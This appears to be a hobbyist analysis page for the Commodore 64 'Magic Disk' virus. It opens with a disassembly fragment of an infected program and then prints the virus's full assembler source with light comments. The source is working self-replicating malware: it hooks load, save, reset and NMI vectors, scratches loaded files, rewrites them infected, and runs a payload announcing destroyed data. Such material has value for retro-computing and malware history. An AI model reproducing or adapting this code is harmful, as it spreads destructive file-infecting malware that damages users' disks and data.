.C:097f 8D 18 D0 STA $D018 .C:0982 A9 0F LDA #$0F .C:0984 20 91 F2 JSR $F291 .C:0987 4C 94 E3 JMP $E394 .C:098a A2 00 LDX #$00 .C:098c BD 00 CD LDA $CD00,X .C:098f 9D 00 08 STA $0800,X .C:0992 BD 00 CE LDA $CE00,X .C:0995 9D FB 08 STA $08FB,X .C:0998 E8 INX .C:0999 D0 F1 BNE $098C .C:099b A9 60 LDA #$60 .C:099d 8D 40 08 STA $0840 .C:09a0 20 0D 08 JSR $080D .C:09a3 A9 AE LDA #$AE .C:09a5 8D 40 08 STA $0840 .C:09a8 AE 15 CF LDX $CF15 .C:09ab D0 C3 BNE $0970 .C:09ad BD F8 CE LDA $CEF8,X .C:09b0 9D 16 CF STA $CF16,X .C:09b3 E8 INX .C:09b4 E0 08 CPX #$08 .C:09b6 D0 F5 BNE $09AD .C:09b8 18 CLC .C:09b9 A9 20 LDA #$20 .C:09bb 6D B3 CE ADC $CEB3 .C:09be 8D B3 CE STA $CEB3 .C:09c1 C9 16 CMP #$16 .C:09c3 D0 E6 BNE $09AB .C:09c5 6C AB CE JMP ($CEAB) .C:09c8 AD 12 D0 LDA $D012 .C:09cb C9 F0 CMP #$F0 .C:09cd 10 03 BPL $09D2 .C:09cf 4C 9B 08 JMP $089B .C:09d2 A9 AE LDA #$AE .C:09d4 A2 A7 LDX #$A7 .C:09d6 8D F3 08 STA $08F3 .C:09d9 8E F4 08 STX $08F4 .C:09dc 6C A1 09 JMP ($09A1) .C:09df 00 BRK .C:09e0 00 BRK .C:09e1 00 BRK .C:09e2 00 BRK .C:09e3 00 BRK .C:09e4 00 BRK .C:09e5 00 BRK .C:09e6 00 BRK .C:09e7 00 BRK .C:09e8 00 BRK .C:09e9 00 BRK .C:09ea 00 BRK .C:09eb 00 BRK .C:09ec 00 BRK .C:09ed 00 BRK .C:09ee 00 BRK .C:09ef 00 BRK .C:09f0 00 BRK .C:09f1 00 BRK .C:09f2 00 BRK 09f3 .byte "S","T","A","R","F","I","R","E" (infected program follows here)
Analysis: Magic Disk Virus
This analysis is from the original (?) sourcecode i found on the disk with the virus, with some more comments and formatting added.
.ba $cbaf .eq status=$90 .eq savecont=$f624 .eq filelo=$bb .eq filehi=$bc .eq fileleng=$b7 .eq setpar=$ffba .eq setnam=$ffbd .eq open=$ffc0 .eq close=$ffc3 .eq savecbm=$ffd8 .eq strout=$ab1e .eq bsout=$ffd2 .eq sid=54272 .eq crsrflag=204 .eq crsrline=214 .eq vic=$d000 .eq frqlo=data-1 .eq frqhi=data-2 .eq countlo=data-3 .eq counthi=data-4 .eq counter=data-5 .eq lengnam=data-6 .eq realend=ende-data+$0801 ;******************************** ; basic stub data .by $15,$08,$0a,$00,$9e .tx "2071:md-virus!" .by 0,0,0 ;******************************** ; copy virus code to $cff0 copyup lda #$37 sta $01 ldx #$01 ldy #$08 stx $5f sty $60 ldx #<(realend) ldy #>(realend) stx $5a sty $5b ldx #$f0 ldy #$cf stx $58 sty $59 jsr $a3bf jmp start ;******************************* ; copy infected program to $0801 ; init virus and run program start lda #$36 sta $01 ldx #01 ldy #08 stx lab5+1 sty lab5+2 ldx #<(realend) ldy #>(realend) stx $fb sty $fc ldx $ae ldy $af stx $f9 sty $fa ldy #00 ldx #00 loop8 lda ($fb),y lab5 sta $0801,x inx bne lab4 inc lab5+2 lab4 jsr inccount bcc loop8 ldy lab5+2 stx $ae sty $af stx $2d sty $2e lda #$37 sta $01 jsr init jsr $a659 jmp $a7ae ;******************************** ; code hooked into cbm80 nmi vector restore jsr $fd15 jsr $fda3 jsr $e518 jsr init2 jmp ($a002) ;******************************** save1 jmp save ;******************************** ; code hooked into cbm80 reset vector reset stx $d016 jsr $fda3 jsr $fd50 jsr $fd15 jsr $ff5b cli jsr init2 jmp ($a000) ;******************************** ; code hooked into load vector load pha lda filelo sta $fb lda filehi sta $fc ldy fileleng sty lengnam loop2 lda ($fb),y sta namebuff+2,y dey bpl loop2 pla sta $93 lda #$00 sta $90 lda $ba bne xf4b2 xf4af jmp $f713 xf4b2 cmp #$03 beq xf4af bcc xf533 ldy $b7 bne xf4bf jmp $f710 xf4bf ldx $b9 jsr $f5af lda #$60 sta $b9 jsr $f3d5 lda $ba jsr $ed09 lda $b9 jsr $edc7 jsr $ee13 sta $ae cmp #01 bne cbmload1 lda $90 lsr lsr bcs loaderror jsr $ee13 sta $af cmp #08 bne cbmload2 jsr $f4e5 bcc inftest rts ;******************************** loaderror jmp $f704 xf533 jmp $f533 cbmload1 jmp $f4da cbmload2 jmp $f4e5 ;******************************** inftest ldy #17 loop7 lda $0801,y cmp data,y bne scratch dey bpl loop7 jmp ($a002) scratch lda #01 ldx #08 ldy #15 jsr setpar lda lengnam clc adc #02 ldx #<(namebuff) ldy #>(namebuff) jsr setnam jsr open lda #01 jsr close ldy lengnam lda namebuff+1,y cmp #"*" bne cont dey cont tya ldx #<(namebuff)+2 ldy #>(namebuff) jsr setnam ldx #08 jsr setpar ldx #01 ldy #08 stx $c1 sty $c2 ldx #00 jsr save jmp saveerror ;******************************** ; hook i/o vectors and install ; cbm80 hook init lda #01 sta copy init2 ldy #03 loop3 lda tab,y sta $0330,y dey bpl loop3 ldy #08 loop4 lda cbm,y sta $8000,y dey bpl loop4 rts ;******************************** xf659 jmp $f659 copy .by 0 ;******************************** saveerror lda status bne shit rts shit lda #<(errortext) ldy #>(errortext) jmp strout ;******************************** ; code hooked into save vector save lda $ba bne xf5f4 xf5f1 jmp $f713 xf5f4 cmp #$03 beq xf5f1 bcc xf659 lda #$61 sta $b9 ldy $b7 bne xf605 jmp $f710 xf605 cpx #00 beq nosaving jsr $f68f nosaving jsr $f3d5 lda $ba jsr $ed0c lda $b9 jsr $edb9 ldy #$00 jsr $fb8e lda $ac cmp #01 beq lab1 ldy #01 lab1 jsr $eddd lda $ad cmp #08 beq lab2 ldy #01 lab2 jsr $eddd cpy #01 bne virusok ldy #00 jmp savecont virusok lda #<(data) sta $fb lda #>(data) sta $fc lda #<(ende) sta $f9 lda #>(ende) sta $fa ldy #00 loop lda ($fb),y jsr $eddd jsr inccount bcc loop jsr savecont jsr saveerror asl copy bcs gag rts ;******************************** ; payload code gag ldx #00 stx crsrflag stx $d020 stx $d021 stx countlo inx stx 646 stx vic+21 ; {$a0} lda #12 sta vic+39 lda #24 sta vic lda #27 sta vic+1 lda #13 sta 2040 ldy #12 lda #00 sloop4 sta 832,y dey bpl sloop4 ldy #50 sloop3 lda sprdat,y sta 845,y dey bpl sloop3 lda #13 jsr bsout lda #32 jsr bsout ;******************************** calc lda crsrline clc adc #03 lsr ror countlo clc adc #$60 sta counthi ;******************************** sound lda #15 sta sid+24 sta counter ldx #01 ldy #$78 stx sid sty sid+1 stx frqlo sty frqhi ldx #$e0 ldy #$f0 stx sid+5 sty sid+6 lda #33 sta sid+4 sloop2 ldy #01 jsr wait dec frqlo bne sl1 dec frqhi sl1 lda counthi cmp frqhi bcc sl5 bne sl6 lda countlo cmp frqlo bcc sl5 sl6 dec counter bpl sl5 inc vic+1 lda #15 sta counter sl5 lda frqhi cmp #$60 beq bye sta sid+1 lda frqlo sta sid jmp sloop2 bye sty sid+4 sty sid+24 lda #"{CBM-P}" jsr bsout sta crsrflag ldy #$ff jsr wait sty vic+21 lda #<(warning) ldy #>(warning) jsr strout jmp init ;******************************** wait ldx #00 sloop1 dex bne sloop1 dey bne sloop1 rts ;******************************** inccount inc $fb bne lab3 inc $fc lab3 lda $fb cmp $f9 bne weiter lda $fc cmp $fa bne weiter sec rts weiter clc rts ;******************************** sprdat .by 124,0,0,198,0,0,198,0,0,108,0,31,255,248 .by 31,177,248,31,183,248,63,177,252,63,181,252,63,177,252,63,255,252,113 .by 22,142,123,82,190,123,84,142,251,84,239,251,22,143,255,255,255,255 ;******************************** ; data for cbm80 hook cbm .wo reset,restore .tx "CBM80" ; vectors for i/o hooks tab .wo load,save errortext .by 13 .tx "Der {rvon}MagicDisk-Virus{rvof} ist in diesem" .by13 .tx "C64 !!! Soeben wurden Daten zerstoert !" .by13 .tx "Bitte Programm auf einer anderen Disk" .by13 .tx "abspeichern !!!" .by 13,14,0 ;******************************** warning .by 13 .tx "Hallo du ! Dein 64er lebt ! Ein paar von" .by13 .tx "deinen Disketten wurden infiziert mit" .by13 .tx"dem {rvon}MagicDisk-Virus{rvof}..." .by 13,14,0 ;******************************** namebuff .tx "s:" ende .by 0